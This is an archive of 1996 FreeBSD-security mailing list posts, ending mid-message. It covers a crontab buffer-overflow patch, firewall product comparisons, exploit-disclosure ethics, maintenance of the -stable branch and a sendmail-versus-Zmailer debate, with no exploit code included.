:) From owner-freebsd-security Mon Dec 16 14:16:54 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07996 for security-outgoing; Mon, 16 Dec 1996 14:16:54 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07897; Mon, 16 Dec 1996 14:16:31 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlKO-0005ST-00; Mon, 16 Dec 1996 15:16:04 -0700 To: Marc Slemko Subject: Re: crontab security hole Cc: Dmitry Valdov , freebsd-bugs@freebsd.org, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 16 Dec 1996 06:51:33 MST." References: Date: Mon, 16 Dec 1996 15:16:04 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : It was fixed in -stable the other day by pst. The patch, pulled : from the CVS tree, follows. : : Index: cron/database.c : =================================================================== : RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v : retrieving revision 1.1.1.1 : retrieving revision 1.1.1.1.6.1 : diff -c -r1.1.1.1 -r1.1.1.1.6.1 : *** database.c 1994/08/27 13:43:03 1.1.1.1 : --- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 : *************** : *** 112,119 **** : if (dp->d_name[0] == '.') : continue; : : ! (void) strcpy(fname, dp->d_name); : ! sprintf(tabname, CRON_TAB(fname)); : : process_crontab(fname, fname, tabname, : &statbuf, &new_db, old_db); : --- 112,119 ---- : if (dp->d_name[0] == '.') : continue; : : ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); : ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); strncpy(fname, dp->d_name, sizeof(fname)-1 ); fname[sizeof(fname)-1] = '\0'; strncpy(tabname, CRON_TAB(fname), sizeof(tabname)-1 ); tabname[sizeof(tabname)-1] = '\0'; : process_crontab(fname, fname, tabname, : &statbuf, &new_db, old_db); ... etc ... would be a better fix since that doesn't involve stdio... Warner From owner-freebsd-security Mon Dec 16 14:42:32 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA10092 for security-outgoing; Mon, 16 Dec 1996 14:42:32 -0800 (PST) Received: from gdi.uoregon.edu (cisco-ts12-line3.uoregon.edu [128.223.150.135]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA10076; Mon, 16 Dec 1996 14:42:27 -0800 (PST) Received: from localhost (dwhite@localhost) by gdi.uoregon.edu (8.8.2/8.6.12) with SMTP id OAA00553; Mon, 16 Dec 1996 14:42:18 -0800 (PST) Date: Mon, 16 Dec 1996 14:42:18 -0800 (PST) From: Doug White Reply-To: dwhite@resnet.uoregon.edu To: Mun Fai WONG cc: questions@freebsd.org, security@freebsd.org Subject: Re: FreeBSD vs BorderWare In-Reply-To: <32b5c1243534002@molhub.mol.net.my> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk The security list could probably comment on this better than I. On Mon, 16 Dec 1996, Mun Fai WONG wrote: > I am given the oppurtunity to propose a Internet gateway/server with > security features in the form of firewall mechanism. The prospective > customers seem to be more keen in BorderWare as the solution for the > following reasons: > > 1) It is based on a secured OS phillosophy Ditto here. Reference the numerous CERT warnings put forward by the FreeBSD group, willingly, to fix 4.4-Lite problems. > 2) It is "commercially" backed by the vendor FreeBSD is backed by the vendor...questions is the support line. I'll bet we'll answer you faster than BorderWare could ever hope to. And it's free (less cost of Internet access). > 3) It has been tested FreeBSD is tested all around the world by organizations great and small, in addition to the rigorous developmental and pre-release testing. In addition, many of the security tools are available from vendors who release software for other OSs and architectures (fwtk comes to mind). > 4) Availability of the source to the modified kernel is impossible compared > to FreeBSD as FreeBSD is a very "open" software distribution with source > codes freely available. So? What's so bad about that? Thousands of people around the world can look at the guts of FreeBSD? What's so insecure about that? if there's a problem, someone will notice it and submit a fix. With commerical applications, there may be a problem, but you won't be able to find where and how to fix it because you won't know the actual root of the problem. If there's a problem with FreeBSD, you can find it, fix it, submit the patch, and see the patch reviewed, committed, and a fix or workaround available in a short amount of time. Commercial software, you're waiting for the next release, which could be months away. > 5) It does VPN, NAT and Secured Server Network (SSN, vs DMZ) Add on tools can implement NAT, but the others I'm not so sure about since I'm not a serious security guru. > So, I really like to get a frank opinion/experience/suggestions on how > people rate FreeBSD 2.1 onwards against BorderWare etc in terms of security > features. The security list (and even -isp) can give you reactions. Hope this note helps. You have the common misconception that commercial implentations are inherently 'better' than publicly available ones -- a misconception that you need to dispel. Doug White | University of Oregon Internet: dwhite@resnet.uoregon.edu | Residence Networking Assistant http://gladstone.uoregon.edu/~dwhite | Computer Science Major From owner-freebsd-security Mon Dec 16 15:19:11 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12930 for security-outgoing; Mon, 16 Dec 1996 15:19:11 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA12924 for ; Mon, 16 Dec 1996 15:19:05 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17565(3)>; Mon, 16 Dec 1996 15:18:20 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177711>; Mon, 16 Dec 1996 15:18:16 -0800 X-Mailer: exmh version 1.6.9 8/22/96 To: Jim Binkley cc: freebsd-security@freebsd.org Subject: Re: Risk of having bpf0? In-reply-to: Your message of "Thu, 12 Dec 1996 09:03:43 PST." <199612121703.JAA11713@sirius.cs.pdx.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Dec 1996 15:18:10 PST From: Bill Fenner Message-Id: <96Dec16.151816pst.177711@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199612121703.JAA11713@sirius.cs.pdx.edu>you write: >question: does rarpd turn i/fs on in promiscuous mode? No. So no need for the rant =) Bill From owner-freebsd-security Mon Dec 16 15:31:52 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA13688 for security-outgoing; Mon, 16 Dec 1996 15:31:52 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA13683 for ; Mon, 16 Dec 1996 15:31:48 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA10241; Mon, 16 Dec 1996 18:27:00 -0500 From: Adam Shostack Message-Id: <199612162327.SAA10241@homeport.org> Subject: Re: crontab security hole exploit In-Reply-To: <199612161810.TAA03636@tiger.cert.dfn.de> from Wolfgang Ley at "Dec 16, 96 07:10:11 pm" To: ley@cert.dfn.de (Wolfgang Ley) Date: Mon, 16 Dec 1996 18:26:05 -0500 (EST) Cc: craig@ProGroup.COM, security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Wolfgang Ley wrote: | > Is there someplace or some book that someone who is writing new software can | > refer to for learning how to write secure code in the first place? I | > certainly don't want to ask some whiny security cop for each and every | > little detail.... :) | You might want to check the the "Secure Programming Checklist" which is | a collection of the suggestions from the "Practical UNIX and Internet | Security" book and a paper from AUSCERT. | | ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist I'll be egotistical and suggest my code review guidelines; they talk about what to look for in a review, and how to write code that will pass one. http://www.homeport.org/~adam/review.html Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Dec 16 15:39:03 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14515 for security-outgoing; Mon, 16 Dec 1996 15:39:03 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA14507 for ; Mon, 16 Dec 1996 15:38:58 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id RAA134396; Mon, 16 Dec 1996 17:38:52 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id RAA22656; Mon, 16 Dec 1996 17:37:35 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199612162337.RAA22656@alecto.physics.uiuc.edu> Subject: Re: mail bomb! To: imp@village.org (Warner Losh) Date: Mon, 16 Dec 1996 17:37:35 -0600 (CST) Cc: ctkwan@cs.hku.hk, pete@sms.fi, security@freebsd.org In-Reply-To: from "Warner Losh" at Dec 16, 96 03:07:09 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > In message Doug Kwan ~{9XUq5B~} writes: > : Most ISP's have customers who are not computer gurus. Asking them > : to use PGP to verify all our messages would not be a good idea. Anyway > : we would take your advice to digitally sign all our messages. > > However, if you do sign all the messages, then you could filter all > those not signed by the right key. The users needn't know which ones > are good or bad, or how to use pgp even. It would be a big clue to > sendmail to filter out messages based on content (if it can do that). > > Warner > I did not check that but probably, procmail can do "sorting" job, passing through messages from the administration, signed with the right pgp and sending to /dev/null the rest. IgoR aka StR From owner-freebsd-security Mon Dec 16 16:33:20 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA19039 for security-outgoing; Mon, 16 Dec 1996 16:33:20 -0800 (PST) Received: from roundtable.cif.rochester.edu (roundtable.cif.rochester.edu [128.151.220.14]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA19032 for ; Mon, 16 Dec 1996 16:33:17 -0800 (PST) Received: (from sadmin@localhost) by roundtable.cif.rochester.edu (8.8.3/8.8.3) id TAA02446 for freebsd-security@freebsd.org; Mon, 16 Dec 1996 19:32:50 -0500 (EST) From: Security Administrator Message-Id: <199612170032.TAA02446@roundtable.cif.rochester.edu> Subject: crontab exploit To: freebsd-security@freebsd.org (FreeBSD Security) Date: Mon, 16 Dec 1996 19:32:50 -0500 (EST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk 12-16-96 I apologize for coming into this discussion just as it seems to be ending, but I was wondering if someone could email me the exploit to which everyone is referring in their letters. I just got onto the freebsd-security mailing list, and I think I missed the original exploit posting by a day or so. Thanks, Josh Pincus. -- System Security Administrator Computer Interest Floor University of Rochester Rochester, NY 14627 sadmin@roundtable.cif.rochester.edu From owner-freebsd-security Mon Dec 16 17:36:36 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id RAA23086 for security-outgoing; Mon, 16 Dec 1996 17:36:36 -0800 (PST) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id RAA23081 for ; Mon, 16 Dec 1996 17:36:33 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id RAA21872; Mon, 16 Dec 1996 17:33:42 -0800 (PST) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199612170133.RAA21872@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: MH X-Sender: cschuber To: Warner Losh cc: Marc Slemko , Adam Kubicki , freebsd-security@freebsd.org Subject: Re: why is -stable not secure? In-reply-to: Your message of "Mon, 16 Dec 96 15:05:32 MST." Date: Mon, 16 Dec 96 17:33:41 -0800 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > In message Marc Sl emko writes: > : Because no one has put them there. They can be there the second after > : they are in -current if they are put there; that happens when the person > : committing them feels confident enough in the patch and has the time to. > > Likely because no one is confortable enough making blind commits to > the -stable branch. I've put a few deltas into the stable branch, but > only after finding people to test them. It is much harder than it > would appear. > > -stable is dead dead dead dead. (the CVS branch based on 2.1.x that > is). If you are worried about security, running 2.2 when it is > released may be your best bet. When will 2.2 be out? Regards, Phone: (250)387-8437 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Mon Dec 16 18:04:13 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA24658 for security-outgoing; Mon, 16 Dec 1996 18:04:13 -0800 (PST) Received: from selkirk.csrv.nidc.edu (selkirk.csrv.nidc.edu [192.133.128.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id SAA24651 for ; Mon, 16 Dec 1996 18:04:10 -0800 (PST) Received: by selkirk.csrv.nidc.edu (1.38.193.5/16.2) id AA05750; Mon, 16 Dec 1996 18:05:10 -0800 Date: Mon, 16 Dec 1996 18:05:10 -0800 (PST) From: Mark Nottage To: security@freefall.freebsd.org In-Reply-To: <199612162339.PAA14524@freefall.freebsd.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk info help //end From owner-freebsd-security Mon Dec 16 18:20:20 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA25890 for security-outgoing; Mon, 16 Dec 1996 18:20:20 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id SAA25866; Mon, 16 Dec 1996 18:20:16 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id TAA01403; Mon, 16 Dec 1996 19:19:53 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id TAA11581; Mon, 16 Dec 1996 19:19:38 -0700 (MST) Date: Mon, 16 Dec 1996 19:19:38 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: freebsd-security@freebsd.org, stable@freebsd.org Subject: Re: why is -stable not secure? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [this may be the start of a nice long useless discussion that has been gone through 100x before; please followup only to the -stable list and NOT to freebsd-security. No, this spew isn't all a response to what Warner has said since he is just echoing reality but is a response to the way things seem to be and where I think it would be nice if they would be.] On Mon, 16 Dec 1996, Warner Losh wrote: > In message Marc Slemko writes: > : Because no one has put them there. They can be there the second after > : they are in -current if they are put there; that happens when the person > : committing them feels confident enough in the patch and has the time to. > > Likely because no one is confortable enough making blind commits to > the -stable branch. I've put a few deltas into the stable branch, but > only after finding people to test them. It is much harder than it > would appear. > > -stable is dead dead dead dead. (the CVS branch based on 2.1.x that > is). If you are worried about security, running 2.2 when it is > released may be your best bet. > > wish I had better news :-( This discussion was bound to come up. It has before, it will again; perhaps about 2.2 next time. Several points: - from a developer's perspective, -stable has been dead for a long time. To some degree it has held back -current developemnt and has resulted in the development version getting too far away from the latest release. This is bad. - from an admin's perspective, -stable is far from dead. There isn't even another release out yet; how can it be dead? We need something to run on our servers. If it were typical MicroSoft junk we may need to upgrade to try to make it work, but -stable works. Very very well. Too well to upgrade to 2.2 until it is proven. The first 2.2 release will have more bugs than -stable has now. More features, but more bugs; they will get worked out, but not overnight. Many people are using FreeBSD for servers because they see it as having more stability over time than the L word. For the people using -stable in a server features don't matter. Minor (in that they are a few lines of code, not that they are unimportant) security fixes are important. - There are many around who could maintain their own local security and serious bug fixes for -stable; many already do. I think there are a significant number of people to which things like security patches to -stable are of importance. - For a long time -stable was treated very carefully because, well, it is supposed to be stable. That caution was warranted and, to a large degree, still is. However, I think that perhaps at this point in -stable's life people should become less concerned about breaking the -stable tree if that means they are more willing to commit to it. Put all these things together, and I think it is worthwhile to keep minimal support for -stable going. Not normal bugfixes, but things like significant security holes. So I think the questions are: - how many existing committers are there that are willing to commit fixes to -stable? - if there isn't enough support on the existing team of committers (and I can certainly understand why that may be the case) for important patches to make it to -stable without special "outside" effort , would it help if someone took the role of "-stable patch dude"? He would take submissions and track -current changes for patches which should be backported to -stable and submit them in a nice, easy to commit well tested format to an existing committer willing to to deal with -stable at that level. If this is necessary, I would be willing to try doing something if no one more suitable is found. - if not, who will be the first to start a seperate repository of either -stable patches or a full -stable with pathes source tree? I realize that most developers want to let -stable die, and agree with their reasons for doing so. However, I have trouble with simply killing it with no alternatives present. From owner-freebsd-security Mon Dec 16 19:37:12 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id TAA23007 for security-outgoing; Mon, 16 Dec 1996 19:37:12 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id TAA23000 for ; Mon, 16 Dec 1996 19:37:08 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id WAA11071; Mon, 16 Dec 1996 22:33:10 -0500 From: Adam Shostack Message-Id: <199612170333.WAA11071@homeport.org> Subject: Re: crontab security hole exploit In-Reply-To: from adam at "Dec 16, 96 06:26:05 pm" To: adam@lighthouse.homeport.org.noname (adam) Date: Mon, 16 Dec 1996 22:32:16 -0500 (EST) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk | I'll be egotistical and suggest my code review guidelines; | they talk about what to look for in a review, and how to write code | that will pass one. | | http://www.homeport.org/~adam/review.html About 30 seconds after I wrote this, I made a really silly mistake and blew away my public_html directory. Its now back from tape. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Dec 16 20:48:01 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id UAA26821 for security-outgoing; Mon, 16 Dec 1996 20:48:01 -0800 (PST) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id UAA26801 for ; Mon, 16 Dec 1996 20:47:56 -0800 (PST) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id UAA02849; Mon, 16 Dec 1996 20:47:43 -0800 Date: Mon, 16 Dec 1996 20:47:40 -0800 (PST) From: Steve Reid To: Richard Wackerbarth cc: Joakim Rastberg , security@freebsd.org Subject: Re: crontab security hole exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > My attitude is that it is better to have obscurity than having the exploit > readily available to a wide audience. I realize that the truly good > crackers can figure it out for themself. But there are many "children" who > will try something when it is handed to them. IMHO, we should at least give > the upper hand to the sysops and, if possible, provide the fix before the > attack becomes widespread. Consider: The SYN-flooding bug in TCP has been known about for _years_. When did OS vendors start including measures to strengthen the kernel against such attacks? Immediately after 2600 and Phrack published exploits. The OS vendors seem wait until those "children" get their hands on the exploits before they consider the holes important enough to fix. On the other hand: SYN flooding is a denial of service attack, and you _know_ when you've been hit. AFAIK, it never happened (except as an experiment) before the exploits were published, and when it started happening the OS vendors (even MS!) scrambled to the rescue. With buffer overruns and such, you may never know that you've been broken in to, so you want to get it fixed before the exploits start happening. I'm sure many such bugs are fixed quietly by the vendors, long before exploits are released. Also, does it really help much to fix crontab, when you can bet your bottom dollar that there are still security problems with sendmail? My personal feeling: You shouldn't post an exploit script publicly unless you have a fix, even if it's only a temporary fix until the vendors can release something better. Removing the suid bit from crontab is at worst a temporary inconvenience to your users, so IMHO that qualifies as a temporary fix. If you send a problem report to the vendor and weeks pass without results, then go ahead and post the exploit. From owner-freebsd-security Tue Dec 17 00:26:36 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA08173 for security-outgoing; Tue, 17 Dec 1996 00:26:36 -0800 (PST) Received: from server.fasts.com (root@server.fasts.com [199.125.215.66]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA08164 for ; Tue, 17 Dec 1996 00:26:31 -0800 (PST) Received: from server.fasts.com ([199.125.215.66]) by fasts.com with SMTP id <14-5867>; Tue, 17 Dec 1996 10:26:23 +0000 Date: Tue, 17 Dec 1996 10:26:09 +0000 () From: Victor Rotanov To: freebsd-security@freebsd.org Subject: sendmail... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello. Why sendmail can't be replaced with something more secure by default? I'd suggest Zmailer which can be fount at ftp://ftp.funet.fi/pub/unix/mail/zmailer It is also seems to be faster than sendmail on high loads. Thanks, bye. vitjok From owner-freebsd-security Tue Dec 17 00:59:59 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA09523 for security-outgoing; Tue, 17 Dec 1996 00:59:59 -0800 (PST) Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA09511 for ; Tue, 17 Dec 1996 00:59:55 -0800 (PST) Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id AAA01249; Tue, 17 Dec 1996 00:59:36 -0800 (PST) Date: Tue, 17 Dec 1996 00:59:36 -0800 (PST) From: Snob Art Genre To: Victor Rotanov cc: freebsd-security@freebsd.org Subject: Re: sendmail... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 17 Dec 1996, Victor Rotanov wrote: > > Hello. > > Why sendmail can't be replaced with something more secure by default? > I'd suggest Zmailer which can be fount at > ftp://ftp.funet.fi/pub/unix/mail/zmailer > It is also seems to be faster than sendmail on high loads. Oh god, don't get the religious wars going again, *please*. > > Thanks, bye. > vitjok > > Ben The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia. From owner-freebsd-security Tue Dec 17 01:04:29 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA09801 for security-outgoing; Tue, 17 Dec 1996 01:04:29 -0800 (PST) Received: from server.fasts.com (root@server.fasts.com [199.125.215.66]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA09791 for ; Tue, 17 Dec 1996 01:04:20 -0800 (PST) Received: from server.fasts.com ([199.125.215.66]) by fasts.com with SMTP id <14-13305>; Tue, 17 Dec 1996 11:04:22 +0000 Date: Tue, 17 Dec 1996 11:04:07 +0000 () From: Victor Rotanov To: Snob Art Genre cc: freebsd-security@freebsd.org Subject: Re: sendmail... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 17 Dec 1996, Snob Art Genre wrote: > On Tue, 17 Dec 1996, Victor Rotanov wrote: > > > > > Hello. > > > > Why sendmail can't be replaced with something more secure by default? > > I'd suggest Zmailer which can be fount at > > ftp://ftp.funet.fi/pub/unix/mail/zmailer > > It is also seems to be faster than sendmail on high loads. > > Oh god, don't get the religious wars going again, *please*. why? anything is more secure than sendmail, and zmailer is used on highly loaded mail servers. > > Ben > > The views expressed above are not those of the Worker's Compensation > Board of Queensland, Australia. > > From owner-freebsd-security Tue Dec 17 01:28:18 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA10858 for security-outgoing; Tue, 17 Dec 1996 01:28:18 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA10843 for ; Tue, 17 Dec 1996 01:28:07 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.4/8.8.4) with ESMTP id KAA16437; Tue, 17 Dec 1996 10:31:26 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.4/8.8.4) id KAA05839; Tue, 17 Dec 1996 10:31:24 +0100 (MET) Message-Id: <199612170931.KAA05839@tiger.cert.dfn.de> Subject: Re: sendmail... To: vitjok@fasts.com (Victor Rotanov) Date: Tue, 17 Dec 1996 10:31:24 +0100 (MET) Cc: freebsd-security@freebsd.org In-Reply-To: from "Victor Rotanov" at Dec 17, 96 10:26:09 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Victor Rotanov wrote: > > Hello. > > Why sendmail can't be replaced with something more secure by default? > I'd suggest Zmailer which can be fount at > ftp://ftp.funet.fi/pub/unix/mail/zmailer > It is also seems to be faster than sendmail on high loads. Proof that Zmailer ist more secure than sendmail (note: "there are no/less *known* security bugs" doesn't count because people most probably haven't bothered to investigate Zmailer/Smail/Qmail/... in the same depth as sendmail). Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMrZoaQQmfXmOCknRAQFcIQQAjKZgCmI6YCqqGF+1GCt/nJn1Rzp+k4d/ 084oXdlEjmzRH0rDPaovNn8RxaNcO4kMTYab6T588wwMSr88QNQKKQTd4XCb/6Pn q4qFMTaupqeSLHbOt9hjG1ZVTXtyBSIAuFhnwKOXR23a44CB8gltZD2urihX78SJ AlAi0eEbvIc= =pjtU -----END PGP SIGNATURE----- From owner-freebsd-security Tue Dec 17 01:30:45 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA10992 for security-outgoing; Tue, 17 Dec 1996 01:30:45 -0800 (PST) Received: from panacea.insight.co.za (panacea.insight.co.za [196.27.7.71]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA10982 for ; Tue, 17 Dec 1996 01:30:24 -0800 (PST) Received: (from tony@localhost) by panacea.insight.co.za (8.8.4/8.7.3) id LAA25530; Tue, 17 Dec 1996 11:29:21 +0200 (SAT) From: Tony Harverson Message-Id: <199612170929.LAA25530@panacea.insight.co.za> Subject: Re: sendmail... To: vitjok@fasts.com (Victor Rotanov) Date: Tue, 17 Dec 1996 11:29:21 +0200 (SAT) Cc: freebsd-security@freebsd.org In-Reply-To: from "Victor Rotanov" at Dec 17, 96 11:04:07 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > On Tue, 17 Dec 1996, Snob Art Genre wrote: > > > On Tue, 17 Dec 1996, Victor Rotanov wrote: > > > > > > > > Hello. > > > > > > Why sendmail can't be replaced with something more secure by default? > > > I'd suggest Zmailer which can be fount at > > > ftp://ftp.funet.fi/pub/unix/mail/zmailer > > > It is also seems to be faster than sendmail on high loads. > > > > Oh god, don't get the religious wars going again, *please*. > why? anything is more secure than sendmail, and zmailer is used on > highly loaded mail servers. Because the last time we tried this, the only thing we established was that all these mailing systems could keep up output at least fast enough to spam the FreeBSD-security mailing list with messages about how cool they are. T From owner-freebsd-security Tue Dec 17 01:54:26 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA12120 for security-outgoing; Tue, 17 Dec 1996 01:54:26 -0800 (PST) Received: from agora.rdrop.com (root@agora.rdrop.com [199.2.210.241]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id BAA12113 for ; Tue, 17 Dec 1996 01:54:23 -0800 (PST) Received: from narcissus.ml.org by agora.rdrop.com with smtp (Smail3.1.29.1 #17) id m0vZwCt-0008tWC; Tue, 17 Dec 96 01:53 PST Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id BAA01312; Tue, 17 Dec 1996 01:09:30 -0800 (PST) Date: Tue, 17 Dec 1996 01:09:30 -0800 (PST) From: Snob Art Genre To: Victor Rotanov cc: freebsd-security@freebsd.org Subject: Re: sendmail... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 17 Dec 1996, Victor Rotanov wrote: > > > On Tue, 17 Dec 1996, Snob Art Genre wrote: > > > On Tue, 17 Dec 1996, Victor Rotanov wrote: > > > > > > > > 